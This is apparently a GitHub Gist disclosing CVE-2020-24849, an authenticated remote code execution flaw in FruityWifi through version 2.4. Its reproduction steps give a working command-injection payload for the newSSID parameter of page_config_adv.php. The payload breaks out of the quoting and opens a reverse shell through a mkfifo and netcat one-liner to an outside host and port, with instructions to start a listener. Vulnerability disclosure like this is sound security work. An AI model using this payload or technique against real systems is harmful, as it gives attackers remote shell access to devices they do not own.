Last active
November 3, 2020 09:20
-
-
Save harsh-bothra/f899045b16bbba264628d79d52c07c22 to your computer and use it in GitHub Desktop.
CVE-2020-24849 - FruityWifi Remote Code Execution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Product: FruityWifi | |
| CVE: CVE-2020-24849 | |
| Version: (, 2.4) - Tested on version 2.4 | |
| Vulnerability: Remote Code Execution | |
| Vulnerability Description: A remote code execution vulnerability is identified in FruityWifi through 2.4.Due to improperly escaped shell metacharacters obtained from the POST request at the page_config_adv.php page, it is possible to perform remote code execution by an authenticated attacker. This is similar to CVE-2018-17317. | |
| # Steps to Reproduce: | |
| 1. Login with credentials to the application. | |
| 2. Go to "https://vuln_ip/scripts/page_config_adv.php". | |
| 3. Intercept the request then change request method to POST. | |
| 4. Add "newSSID" parameter in POST body and insert payload (newSSID=A\"B'C";rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.56.1+4441+>/tmp/f;#) and start nc listener on 4441 port. | |
| Note: In order to bypass, we need to satisfy the quotes then insert our payload. Send the request, you will be greeted with a shell. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment